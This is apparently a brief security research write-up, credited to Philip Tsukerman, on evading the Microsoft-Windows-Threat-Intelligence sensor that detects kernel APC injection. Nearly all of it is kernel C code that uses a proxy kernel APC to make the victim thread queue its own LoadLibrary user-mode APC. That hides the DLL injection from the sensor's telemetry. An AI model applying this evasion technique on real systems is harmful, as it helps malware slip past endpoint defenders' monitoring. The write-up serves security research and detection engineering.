Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor

Somewhat annotated Hex-Rays output for KeInsertQueueApc
1) This meme is way too old. 2) No. Just no.
```c
// Initialize the injecting APC: a user-mode APC whose normal routine is
// LoadLibrary, targeting the victim thread.
KeInitializeApc(TargetApc, TargetThread, OriginalApcEnvironment, TargetApcKernelCleanup, NULL, (PKNORMAL_ROUTINE)LoadLibraryAddress, UserMode, sectionAddress);
// Initialize the proxy APC: a kernel-mode APC for the same target thread.
KeInitializeApc(ProxyApc, TargetThread, OriginalApcEnvironment, ProxyApcRoutine, NULL, NULL, KernelMode, NULL);
// Queue the proxy APC to the target thread, passing the injecting APC as its argument.
KeInsertQueueApc(ProxyApc, TargetApc, LibraryName, 0);

// Kernel routine of the proxy APC. It runs in the context of the target thread,
// so the user-mode APC below is queued by the target thread itself rather than
// by the injecting thread.
VOID NTAPI ProxyApcRoutine(
    _In_ PKAPC Apc,
    _Inout_ PKNORMAL_ROUTINE* NormalRoutine,
    _Inout_ PVOID* NormalContext,
    _Inout_ PVOID* SystemArgument1,
    _Inout_ PVOID* SystemArgument2
)
{
    // SystemArgument1 holds the injecting APC handed over by the outer KeInsertQueueApc.
    KeInsertQueueApc(*(PKAPC*)SystemArgument1, SystemArgument2, NULL, 0);
    KeTestAlertThread(UserMode);
    ExFreePoolWithTag(Apc, POOL_TAG);
    return;
}
```

Philip Tsukerman